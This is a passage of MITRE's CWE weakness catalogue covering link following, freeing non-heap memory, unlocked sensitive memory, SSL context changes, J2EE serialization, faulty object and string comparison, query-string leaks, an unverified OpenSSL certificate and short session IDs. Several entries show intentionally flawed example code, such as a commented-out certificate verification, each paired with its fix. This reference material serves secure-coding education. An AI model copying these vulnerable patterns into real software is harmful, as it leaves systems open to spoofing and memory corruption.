.exe, .com, and .bat by using a .lnk file that refers to the attachment, aka "Stealth Attachment." - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0342 - - - CVE-2001-1042 - FTP server allows remote attackers to read arbitrary files and directories by uploading a .lnk (link) file that points to the target file. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1042 - - - CVE-2001-1043 - FTP server allows remote attackers to read arbitrary files and directories by uploading a .lnk (link) file that points to the target file. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1043 - - - CVE-2005-0587 - Browser allows remote malicious web sites to overwrite arbitrary files by tricking the user into downloading a .LNK (link) file twice, which overwrites the file that was referenced in the first .LNK file. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0587 - - - CVE-2001-1386 - ".LNK." - .LNK with trailing dot - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1386 - - - CVE-2003-1233 - Rootkits can bypass file access restrictions to Windows kernel directories using NtCreateSymbolicLinkObject function to create symbolic link - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1233 - - - CVE-2002-0725 - File system allows local attackers to hide file usage activities via a hard link to the target file, which causes the link to be recorded in the audit trail instead of the target file. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0725 - - - CVE-2003-0844 - Web server plugin allows local users to overwrite arbitrary files via a symlink attack on predictable temporary filenames. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0844 - - - - File Processing - - - File or Directory - - - - Link Following - - - FIO02-C - Canonicalize path names originating from untrusted sources - - - POS01-C - Check for the existence of links when dealing with files - - - FIO01-PL - Do not operate on files that can be modified by untrusted users - CWE More Specific - - - SFP18 - Link in resource name resolution - - - - - - - - - - - - - - Link following vulnerabilities are Multi-factor Vulnerabilities (MFV). They are the combination of multiple elements: file or directory permissions, filename predictability, race conditions, and in some cases, a design limitation in which there is no mechanism for performing atomic file creation operations. - Some potential factors are race conditions, permissions, and predictability. - - UNIX hard links, and Windows hard/soft links are under-studied and under-reported. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Alternate_Terms, Applicable_Platforms, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-01-12 - updated Relationships - - - CWE Content Team - MITRE - 2009-05-27 - updated Description, Name - - - CWE Content Team - MITRE - 2009-10-29 - updated Background_Details, Other_Notes - - - CWE Content Team - MITRE - 2010-02-16 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2010-04-05 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Observed_Examples, References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Common_Consequences, Other_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Affected_Resources, Applicable_Platforms, Causal_Nature, Common_Consequences, Functional_Areas, Likelihood_of_Exploit, Modes_of_Introduction, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Relationships - - Link Following - Failure to Resolve Links Before File Access (aka 'Link Following') - - - - The application calls free() on a pointer to memory that was not allocated using associated heap allocation functions such as malloc(), calloc(), or realloc(). - When free() is called on an invalid pointer, the program's memory management data structures may become corrupted. This corruption can cause the program to crash or, in some circumstances, an attacker may be able to cause free() to operate on controllable memory locations to modify critical program variables or execute code. - - - - - - - Implementation - - - - - Integrity - Confidentiality - Availability - Execute Unauthorized Code or Commands - Modify Memory - There is the potential for arbitrary code execution with privileges of the vulnerable program via a "write, what where" primitive. If pointers to memory which hold user information are freed, a malicious user will be able to write 4 bytes anywhere in memory. - - - - - Implementation - Only free pointers that you have called malloc on previously. This is the recommended solution. Keep track of which pointers point at the beginning of valid chunks and free them only once. - - - Implementation - Before freeing a pointer, the programmer should make sure that the pointer was previously allocated on the heap and that the memory belongs to the programmer. Freeing an unallocated pointer will cause undefined behavior in the program. - - - Architecture and Design - Libraries or Frameworks - - Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. - For example, glibc in Linux provides protection against free of invalid pointers. - - - - Architecture and Design - Use a language that provides abstractions for memory allocation and deallocation. - - - Testing - Use a tool that dynamically detects memory management problems, such as valgrind. - - - - - In this example, an array of record_t structs, bar, is allocated automatically on the stack as a local variable and the programmer attempts to call free() on the array. The consequences will vary based on the implementation of free(), but it will not succeed in deallocating the memory. - - void foo(){ - record_t bar[MAX_SIZE]; - - /* do something interesting with bar */ - - ...free(bar); - } - - This example shows the array allocated globally, as part of the data segment of memory and the programmer attempts to call free() on the array. - - record_t bar[MAX_SIZE]; //Global varvoid foo(){ - - - /* do something interesting with bar */ - ...free(bar); - } - - Instead, if the programmer wanted to dynamically manage the memory, malloc() or calloc() should have been used. - - void foo(){ - record_t *bar = (record_t*)malloc(MAX_SIZE*sizeof(record_t)); - - /* do something interesting with bar */ - - ...free(bar); - } - - Additionally, you can pass global variables to free() when they are pointers to dynamically allocated memory. - - record_t *bar; //Global varvoid foo(){ - bar = (record_t*)malloc(MAX_SIZE*sizeof(record_t)); - - /* do something interesting with bar */ - - ...free(bar); - } - - - - - Memory - - - - MEM34-C - Only free memory allocated dynamically - Exact - - - WIN30-C - Properly pair allocation and deallocation functions - Imprecise - - - SFP12 - Faulty Memory Release - - - - - - - In C++, if the new operator was used to allocate the memory, it may be allocated with the malloc(), calloc() or realloc() family of functions in the implementation. Someone aware of this behavior might choose to map this problem to CWE-590 or to its parent, CWE-762, depending on their perspective. - - - - CWE Community - 2006-12-15 - Submitted by members of the CWE community to extend early CWE versions - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Other_Notes - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-01-12 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2009-05-27 - updated Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Name, Other_Notes, Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-02-18 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Maintenance_Notes, Other_Notes - - Improperly Freeing Heap Memory - Free of Invalid Pointer Not on the Heap - Free of Memory not on the Heap - - - - The application stores sensitive data in memory that is not locked, or that has been incorrectly locked, which might cause the memory to be written to swap files on disk by the virtual memory manager. This can make the data more accessible to external actors. - On Windows systems the VirtualLock function can lock a page of memory to ensure that it will remain present in memory and not be swapped to disk. However, on older versions of Windows, such as 95, 98, or Me, the VirtualLock() function is only a stub and provides no protection. On POSIX systems the mlock() call ensures that a page will stay resident in memory but does not guarantee that the page will not appear in the swap. Therefore, it is unsuitable for use as a protection mechanism for sensitive data. Some platforms, in particular Linux, do make the guarantee that the page will not be swapped, but this is non-standard and is not portable. Calls to mlock() also require supervisor privilege. Return values for both of these calls must be checked to ensure that the lock operation was actually successful. - - - - - - Implementation - - - - - Confidentiality - Read Application Data - Read Memory - Sensitive data that is written to a swap file may be exposed. - - - - - Architecture and Design - Identify data that needs to be protected from swapping and choose platform-appropriate protection mechanisms. - - - Implementation - Check return values to ensure locking operations are successful. - - - - Memory - - - - A8 - Insecure Storage - CWE More Specific - - - MEM06-C - Ensure that sensitive data is not written out to disk - - - SFP23 - Exposed Data - - - - - CWE Community - 2006-12-15 - Submitted by members of the CWE community to extend early CWE versions - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Memory Locking - - - - This weakness has been deprecated because it covered redundant concepts already described in CWE-287. - - - CWE Content Team - MITRE - 2006-12-15 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Common_Consequences, Description, Name, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type - - Authentication Bypass Issues - - - - The software modifies the SSL context after connection creation has begun. - If the program modifies the SSL_CTX object after creating SSL objects from it, there is the possibility that older SSL objects created from the original context could all be affected by that change. - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Access Control - Bypass Protection Mechanism - No authentication takes place in this process, bypassing an assumed protection of encryption. - - - Confidentiality - Read Application Data - The encrypted communication between a user and a trusted host may be subject to a sniffing attack. - - - - - Architecture and Design - Use a language or a library that provides a cryptography framework at a higher level of abstraction. - - - Implementation - Most SSL_CTX functions have SSL counterparts that act on SSL-type objects. - - - Implementation - Applications should set up an SSL_CTX completely, before creating SSL objects from it. - - - - - The following example demonstrates the weakness. - - #define CERT "secret.pem"#define CERT2 "secret2.pem" - int main(){ - SSL_CTX *ctx;SSL *ssl;init_OpenSSL();seed_prng(); - ctx = SSL_CTX_new(SSLv23_method()); - if (SSL_CTX_use_certificate_chain_file(ctx, CERT) != 1)int_error("Error loading certificate from file"); - - if (SSL_CTX_use_PrivateKey_file(ctx, CERT, SSL_FILETYPE_PEM) != 1)int_error("Error loading private key from file"); - - if (!(ssl = SSL_new(ctx)))int_error("Error creating an SSL context"); - - if ( SSL_CTX_set_default_passwd_cb(ctx, "new default password" != 1))int_error("Doing something which is dangerous to do anyways"); - - if (!(ssl2 = SSL_new(ctx)))int_error("Error creating an SSL context"); - - } - - - - - - - - - CWE Community - 2006-12-15 - Submitted by members of the CWE community to extend early CWE versions - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes - - - CWE Content Team - MITRE - 2009-07-27 - updated Description, Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Common_Consequences, Relationships - - - - - When the J2EE container attempts to write unserializable objects to disk there is no guarantee that the process will complete successfully. - In heavy load conditions, most J2EE application frameworks flush objects to disk to manage memory requirements of incoming requests. For example, session scoped objects, and even application scoped objects, are written to disk when required. While these application frameworks do the real work of writing objects to disk, they do not enforce that those objects be serializable, thus leaving the web application vulnerable to crashes induced by serialization failure. An attacker may be able to mount a denial of service attack by sending enough requests to the server to force the web application to save objects to disk. - - - - - - Indirect - - - Primary - - - - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Modify Application Data - Data represented by unserializable objects can be corrupted. - - - Availability - DoS: Crash, Exit, or Restart - Non-serializability of objects can lead to system crash. - - - - - Architecture and Design - Implementation - All objects that become part of session and application scope must implement the java.io.Serializable interface to ensure serializability of containing objects. - - - - - In the following Java example, a Customer Entity JavaBean provides access to customer information in a database for a business application. The Customer Entity JavaBean is used as a session scoped object to return customer information to a Session EJB. - - @Entitypublic class Customer { - - private String id;private String firstName;private String lastName;private Address address; - public Customer() {} - public Customer(String id, String firstName, String lastName) {...} - @Idpublic String getCustomerId() {...} - public void setCustomerId(String id) {...} - public String getFirstName() {...} - public void setFirstName(String firstName) {...} - public String getLastName() {...} - public void setLastName(String lastName) {...} - @OneToOne()public Address getAddress() {...} - public void setAddress(Address address) {...} - - - } - - However, the Customer Entity JavaBean is an unserialized object which can cause serialization failure and crash the application when the J2EE container attempts to write the object to the system. Session scoped objects must implement the Serializable interface to ensure that the objects serialize properly. - - public class Customer implements Serializable {...} - - - - - - SFP1 - Glitch in computation - - - - - CWE Community - 2006-12-15 - Submitted by members of the CWE community to extend early CWE versions - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes - - - CWE Content Team - MITRE - 2010-02-16 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Weakness_Ordinalities - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Persistence in J2EE Frameworks - - - - The program compares object references instead of the contents of the objects themselves, preventing it from detecting equivalent objects. - For example, in Java, comparing objects using == usually produces deceptive results, since the == operator compares object references rather than values; often, this means that using == for strings is actually comparing the strings' references, not their values. - - - - - - - - - - - - Implementation - - - - - Other - Varies by Context - This weakness can lead to erroneous results that can cause unexpected application behaviors. - - - - - Implementation - In Java, use the equals() method to compare objects instead of the == operator. If using ==, it is important for performance reasons that your objects are created by a static factory, not by a constructor. - - - - - In the example below, two Java String objects are declared and initialized with the same string values. An if statement is used to determine if the strings are equivalent. - - String str1 = new String("Hello");String str2 = new String("Hello");if (str1 == str2) {System.out.println("str1 == str2");} - - However, the if statement will not be executed as the strings are compared using the "==" operator. For Java objects, such as String objects, the "==" operator compares object references, not object values. While the two String objects above contain the same string values, they refer to different object references, so the System.out.println statement will not be executed. To compare object values, the previous code could be modified to use the equals method: - - if (str1.equals(str2)) {System.out.println("str1 equals str2");} - - - - In the following Java example, two BankAccount objects are compared in the isSameAccount method using the == operator. - - public boolean isSameAccount(BankAccount accountA, BankAccount accountB) {return accountA == accountB;} - - Using the == operator to compare objects may produce incorrect or deceptive results by comparing object references rather than values. The equals() method should be used to ensure correct results or objects should contain a member variable that uniquely identifies the object. - The following example shows the use of the equals() method to compare the BankAccount objects and the next example uses a class get method to retrieve the bank account number that uniquely identifies the BankAccount object to compare the objects. - - public boolean isSameAccount(BankAccount accountA, BankAccount accountB) {return accountA.equals(accountB);} - - - - - - EXP02-J - Use the two-argument Arrays.equals() method to compare the contents of arrays - - - EXP02-J - Use the two-argument Arrays.equals() method to compare the contents of arrays - - - EXP03-J - Do not use the equality operators when comparing values of boxed primitives - - - - - - - - CWE Content Team - MITRE - 2006-12-15 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Other_Notes - - - CWE Content Team - MITRE - 2009-05-27 - updated Name - - - CWE Content Team - MITRE - 2010-12-13 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Demonstrative_Examples, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Applicable_Platforms, Common_Consequences - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Applicable_Platforms, Common_Consequences, Description, Other_Notes, Potential_Mitigations, References, Relationships, Type - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - Incorrect Object Comparison: Syntactic - Incorrect Syntactic Object Comparison - - - - This weakness has been deprecated. It was poorly described and difficult to distinguish from other entries. It was also inappropriate to assign a separate ID solely because of domain-specific considerations. Its closest equivalent is CWE-1023. - - - CWE Content Team - MITRE - 2006-12-15 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Detection_Factors, Relationships - - - CWE Content Team - MITRE - 2010-02-16 - updated Detection_Factors - - - CWE Content Team - MITRE - 2011-03-29 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Name, Relationships, Time_of_Introduction, Type - - Incorrect Object Comparison: Semantic - Incorrect Semantic Object Comparison - - - - The product uses the wrong operator when comparing a string, such as using "==" when the .equals() method should be used instead. - In Java, using == or != to compare two strings for equality actually compares two objects for equality rather than their string values for equality. Chances are good that the two references will never be equal. While this weakness often only affects program correctness, if the equality is used for a security decision, the unintended comparison result could be leveraged to affect program security. - - - - - - - - Implementation - - - - - Other - Other - - - - - Implementation - Within Java, use .equals() to compare string values. - Within JavaScript, use == to compare string values. - Within PHP, use == to compare a numeric value to a string value. (PHP converts the string to a number.) - - High - - - - - In the example below, two Java String objects are declared and initialized with the same string values. An if statement is used to determine if the strings are equivalent. - - String str1 = new String("Hello");String str2 = new String("Hello");if (str1 == str2) {System.out.println("str1 == str2");} - - However, the if statement will not be executed as the strings are compared using the "==" operator. For Java objects, such as String objects, the "==" operator compares object references, not object values. While the two String objects above contain the same string values, they refer to different object references, so the System.out.println statement will not be executed. To compare object values, the previous code could be modified to use the equals method: - - if (str1.equals(str2)) {System.out.println("str1 equals str2");} - - - - In the example below, three JavaScript variables are declared and initialized with the same values. Note that JavaScript will change a value between numeric and string as needed, which is the reason an integer is included with the strings. An if statement is used to determine whether the values are the same. - - <p id="ieq3s1" type="text">(i === s1) is FALSE</p> - <p id="s4eq3i" type="text">(s4 === i) is FALSE</p> - <p id="s4eq3s1" type="text">(s4 === s1) is FALSE</p> - - var i = 65; - var s1 = '65'; - var s4 = new String('65'); - - if (i === s1) - { - document.getElementById("ieq3s1").innerHTML = "(i === s1) is TRUE"; - } - - if (s4 === i) - { - document.getElementById("s4eq3i").innerHTML = "(s4 === i) is TRUE"; - } - - if (s4 === s1) - { - document.getElementById("s4eq3s1").innerHTML = "(s4 === s1) is TRUE"; - } - - However, the body of the if statement will not be executed, as the "===" compares both the type of the variable AND the value. As the types of the first comparison are number and string, it fails. The types in the second are int and reference, so this one fails as well. The types in the third are reference and string, so it also fails. - While the variables above contain the same values, they are contained in different types, so the document.getElementById... statement will not be executed in any of the cases. - To compare object values, the previous code is modified and shown below to use the "==" for value comparison so the comparison in this example executes the HTML statement: - - <p id="ieq2s1" type="text">(i == s1) is FALSE</p> - <p id="s4eq2i" type="text">(s4 == i) is FALSE</p> - <p id="s4eq2s1" type="text">(s4 == s1) is FALSE</p> - - var i = 65; - var s1 = '65'; - var s4 = new String('65'); - - if (i == s1) - { - document.getElementById("ieq2s1").innerHTML = "(i == s1) is TRUE"; - } - - if (s4 == i) - { - document.getElementById("s4eq2i").innerHTML = "(s4 == i) is TRUE"; - } - - if (s4 == s1) - { - document.getElementById("s4eq2s1").innerHTML = "(s4 == s1) is TRUE"; - } - - - - - In the example below, two PHP variables are declared and initialized with the same numbers - one as a string, the other as an integer. Note that PHP will change the string value to a number for a comparison. An if statement is used to determine whether the values are the same. - - var $i = 65; - var $s1 = "65"; - - if ($i === $s1) - { - echo '($i === $s1) is TRUE'. "\n"; - } - else - { - echo '($i === $s1) is FALSE'. "\n"; - } - - However, the body of the if statement will not be executed, as the "===" compares both the type of the variable AND the value. As the types of the first comparison are number and string, it fails. - While the variables above contain the same values, they are contained in different types, so the TRUE portion of the if statement will not be executed. - To compare object values, the previous code is modified and shown below to use the "==" for value comparison (string converted to number) so the comparison in this example executes the TRUE statement: - - var $i = 65; - var $s1 = "65"; - - if ($i == $s1) - { - echo '($i == $s1) is TRUE'. "\n"; - } - else - { - echo '($i == $s1) is FALSE'. "\n"; - } - - - - - - EXP03-J - Do not use the equality operators when comparing values of boxed primitives - - - EXP03-J - Do not use the equality operators when comparing values of boxed primitives - - - EXP35-PL - Use the correct operator type for comparing values - CWE More Specific - - - SFP1 - Glitch in computation - - - - - - - - CWE Content Team - MITRE - 2006-12-15 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships - - - CWE Content Team - MITRE - 2008-10-14 - updated Relationships - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-03-29 - updated Demonstrative_Examples, Description, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples, Description, Potential_Mitigations, Relationships - - Erroneous String Compare - - - - The web application uses the HTTP GET method to process a request and includes sensitive information in the query string of that request. - The query string for the URL could be saved in the browser's history, passed through Referers to other web sites, stored in web logs, or otherwise recorded in other sources. If the query string contains sensitive information such as session identifiers, then attackers can use this information to launch further attacks. - - - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Read Application Data - At a minimum, attackers can garner information from query strings that can be utilized in escalating their method of attack, such as information about the internal workings of the application or database column names. Successful exploitation of query string parameter vulnerabilities could lead to an attacker impersonating a legitimate user, obtaining proprietary data, or simply executing actions not intended by the application developers. - - - - - Implementation - When sensitive information is sent, use the POST method (e.g. registration form). - - - - - SFP23 - Exposed Data - - - - - CWE Community - 2006-12-15 - Submitted by members of the CWE community to extend early CWE versions - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2011-03-29 - updated Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Other_Notes - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Name, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Description - - Information Leak Through GET Request - Information Leak Through Query Strings in GET Request - Information Exposure Through Query Strings in GET Request - - - - The software uses OpenSSL and trusts or uses a certificate without using the SSL_get_verify_result() function to ensure that the certificate satisfies all necessary security requirements. - This could allow an attacker to use an invalid certificate to claim to be a trusted host, use expired certificates, or conduct other attacks that could be detected if the certificate is properly validated. - - - - - - Architecture and Design - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - Implementation - - - - - Confidentiality - Read Application Data - The data read may not be properly secured, it might be viewed by an attacker. - - - Access Control - Bypass Protection Mechanism - Gain Privileges or Assume Identity - Trust afforded to the system in question may allow for spoofing or redirection attacks. - - - Access Control - Gain Privileges or Assume Identity - If the certificate is not checked, it may be possible for a redirection or spoofing attack to allow a malicious host with a valid certificate to provide data under the guise of a trusted host. While the attacker in question may have a valid certificate, it may simply be a valid certificate for a different site. In order to ensure data integrity, we must check that the certificate is valid, and that it pertains to the site we wish to access. - - - - - Architecture and Design - Ensure that proper authentication is included in the system design. - - - Implementation - Understand and properly implement all checks necessary to ensure the identity of entities involved in encrypted communications. - - - - - The following OpenSSL code ensures that the host has a certificate. - - if (cert = SSL_get_peer_certificate(ssl)) { - - - // got certificate, host can be trusted - - - //foo=SSL_get_verify_result(ssl); - - - //if (X509_V_OK==foo) ... - - - } - - Note that the code does not call SSL_get_verify_result(ssl), which effectively disables the validation step that checks the certificate. - - - - CWE-295 and CWE-599 are very similar, although CWE-599 has a more narrow scope that is only applied to OpenSSL certificates. As a result, other children of CWE-295 can be regarded as children of CWE-599 as well. CWE's use of one-dimensional hierarchical relationships is not well-suited to handle different kinds of abstraction relationships based on concepts like types of resources ("OpenSSL certificate" as a child of "any certificate") and types of behaviors ("not validating expiration" as a child of "improper validation"). - - - - CWE Community - 2006-12-15 - Submitted by members of the CWE community to extend early CWE versions - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-07-27 - updated Relationships - - - CWE Content Team - MITRE - 2010-12-13 - updated Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Other_Notes - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2013-02-21 - updated Demonstrative_Examples, Description, Name, Relationship_Notes, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2019-09-19 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - No OpenSSL Certificate Check Performed before Use - Trust of OpenSSL Certificate Without Validation - - - - The J2EE application is configured to use an insufficient session ID length. - If an attacker can guess or steal a session ID, then they may be able to take over the user's session (called session hijacking). The number of possible session IDs increases with increased session ID length, making it more difficult to guess or steal a session ID. - - - - - - - - - Session ID's can be used to identify communicating parties in a web environment. - The expected number of seconds required to guess a valid session identifier is given by the equation: (2^B+1)/(2*A*S) Where: - B is the number of bits of entropy in the session identifier. - A is the number of guesses an attacker can try each second. - S is the number of valid session identifiers that are valid and available to be guessed at any given time. The number of bits of entropy in the session identifier is always less than the total number of bits in the session identifier. For example, if session identifiers were provided in ascending order, there would be close to zero bits of entropy in the session identifier no matter the identifier's length. Assuming that the session identifiers are being generated using a good source of random numbers, we will estimate the number of bits of entropy in a session identifier to be half the total number of bits in the session identifier. For realistic identifier lengths this is possible, though perhaps optimistic. - - - - - Architecture and Design - COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. - - - Implementation - - - - - Access Control - Gain Privileges or Assume Identity - If an attacker can guess an authenticated user's session identifier, they can take over the user's session. - - - - - Implementation - Session identifiers should be at least 128 bits long to prevent brute-force session guessing. A shorter session identifier leaves the application open to brute-force session guessing attacks. - - - Implementation - A lower bound on the number of valid session identifiers that are available to be guessed is the number of users that are active on a site at any given moment. However, any users that abandon their sessions without logging out will increase this number. (This is one of many good reasons to have a short inactive session timeout.) With a 64 bit session identifier, assume 32 bits of entropy. For a large web site, assume that the attacker can try 1,000 guesses per second and that there are 10,000 valid session identifiers at any given moment. Given these assumptions, the expected time for an attacker to successfully guess a valid session identifier is less than 4 minutes. Now assume a 128 bit session identifier that provides 64 bits of entropy. With a very large web site, an attacker might try 10,000 guesses per second with 100,000 valid session identifiers available to be 